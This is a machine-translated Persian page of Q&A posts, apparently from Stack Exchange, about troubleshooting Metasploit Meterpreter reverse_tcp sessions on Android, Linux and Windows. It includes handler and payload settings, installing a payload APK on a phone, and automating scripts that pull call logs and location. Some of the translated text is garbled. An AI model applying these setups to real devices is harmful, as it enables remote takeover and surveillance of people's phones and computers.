من سعی میکنم اسکریپتهای یک Loadload Android Metasploit را خودکار کنم. من می توانم هر اسکریپت را در ماژول / post
به صورت خودکار با موفقیت انجام دهم، اما من سعی می کنم به طور خودکار geolocate
، dump_calllog
و دیگران که در پست ماژول نیستند . من از آنچه که در پوشه های metasploit جستجو می کنم فکر می کنم که آنها در پوشه / lib / rex
هستند. چگونه می توانم آنها را در autorunscript
اضافه کنم به طوری که آنها را به طور خودکار؟
شبکه – پوسته Meterpreter و پوسته سیستم تعریف شده است؟
اندرویدی metropter reverse_tcp FAIL – امنیت اطلاعات پشته Exchange
من سعی میکنم با گوشی Androidroid / meterpreter / revere_tcp به اندروید 6.0 حمله کنم. بنابراین من loadload را تولید می کنم، بنابراین فایل apk، با IP درست (محلی) و پورت. من set up a listner exploit / multi / handler و loadroid android / meterpreter / revere_tcp را با گزینه های مشابه (LHOST LPORT) از فایل APK تولید شده قبل ایجاد کردم. بنابراین من سوء استفاده می کنم، برنامه را بر روی گوشی نصب شده در همان شبکه متصل می کنم، اما زمانی که روی فعالیت اصلی کلیک می کنم، در تلفن هیچ اتفاقی نمی افتد! برنامه شروع نمی شود همچنین در ترمینال در کامپیوتر. چرا این؟
metasploit – آپلود فایل Meterpreter – تقسیم تقسیم بندی
من انجام برخی از آزمایش ها در دو VM، یک اجرا Kali و دیگری اجرا اوبونتو. من مشکل فرمان "آپلود" Meterpreter را دارم. به طور خاص، من قبلا یک session tcp معکوس با استفاده از linux / x86 / meterpreter_reverse_tcp loadload باز کرده و با استفاده از exploit / multi / handler exploit کار می کند.
هنگامی که جلسه در روشن است، من سعی کردم فایل file.sh را با استفاده از دستور "آپلود" آپلود کنم:
metpreter> upload kali / path / to / file.sh ubuntu / destination / path
آنچه در Vali Kali دریافت می کنم:
[*] uploading: kali / path / to / file.sh -> ubuntu / destination / path
[*] 10.0.2.15 - جلسه Meterpreter 3 بسته شد. دلیل: مرده
در VM ubuntu یک خطای جداسازی گسل دریافت می شود.
تمام دستورات مترpreter دیگر کار می کنند (حتی یک بار دانلود).
آیا کسی میتواند به من در درک مشکل کمک کند؟
metasploit – فرمان Meterpreter در پوسته کار نمی کند
من از استفاده از چند / handler
و بعد را تنظیم PAYLOAD windows / meterpreter / reverse_tcp
و سپس تنظیم LPORT 80
و LHOST 192.168.0.11
را پس از که من exploit-j -z
را اجرا می کنم و بر روی دستگاه ویندوز من متصل به همان شبکه و به 192.168.0.11:80 متصل می شود و سپس جلسه خود را با جلسات -i 1
باز می کنم من در پوسته مترpreter من. هنگامی که من سعی می کنم برای اجرا ls، ps، cd، دانلود
و غیره … من می توانم Command Unknown: command
. من اشتباه میکنم؟ برخی از دستورات مانند help
هنوز هم کار می کنند.